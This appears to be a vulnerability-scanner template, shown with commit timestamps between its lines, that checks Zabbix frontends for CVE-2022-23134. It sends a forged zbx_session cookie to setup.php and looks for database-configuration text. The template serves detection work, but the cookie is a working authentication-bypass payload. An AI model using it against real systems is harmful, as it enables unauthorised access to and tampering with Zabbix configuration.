2022-02-25 16:00:40 +00:00
id : CVE-2022-23134
info :
2022-03-08 17:35:20 +00:00
name : Zabbix Setup Configuration Authentication Bypass
2022-02-25 16:00:40 +00:00
author : bananabr
severity : medium
2022-04-22 10:38:41 +00:00
description : After the initial setup process, some steps of setup.php file are reachable not only by super-administrators but also by unauthenticated users. A malicious actor can pass step checks and potentially
change the configuration of Zabbix Frontend.
2022-02-25 16:00:40 +00:00
reference :
- https://blog.sonarsource.com/zabbix-case-study-of-unsafe-session-storage
- https://nvd.nist.gov/vuln/detail/CVE-2022-23134
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
cvss-score : 5.3
cve-id : CVE-2022-23134
tags : cve,cve2022,zabbix,auth-bypass
requests :
- method : GET
path :
- "{{BaseURL}}/zabbix/setup.php"
- "{{BaseURL}}/setup.php"
2022-02-25 18:30:48 +00:00
2022-02-25 16:00:40 +00:00
headers :
Cookie : "zbx_session=eyJzZXNzaW9uaWQiOiJJTlZBTElEIiwiY2hlY2tfZmllbGRzX3Jlc3VsdCI6dHJ1ZSwic3RlcCI6Niwic2VydmVyQ2hlY2tSZXN1bHQiOnRydWUsInNlcnZlckNoZWNrVGltZSI6MTY0NTEyMzcwNCwic2lnbiI6IklOVkFMSUQifQ%3D%3D"
2022-02-25 18:30:48 +00:00
stop-at-first-match : true
2022-02-25 16:00:40 +00:00
matchers-condition : and
matchers :
- type : word
words :
- "Database"
- "host"
- "port"
2022-02-25 18:30:48 +00:00
- "Zabbix"
2022-02-25 16:00:40 +00:00
condition : and
2022-02-25 18:30:48 +00:00
2022-02-25 16:00:40 +00:00
- type : status
status :
2022-03-08 15:36:27 +00:00
- 200
# Enhanced by mp on 2022/03/08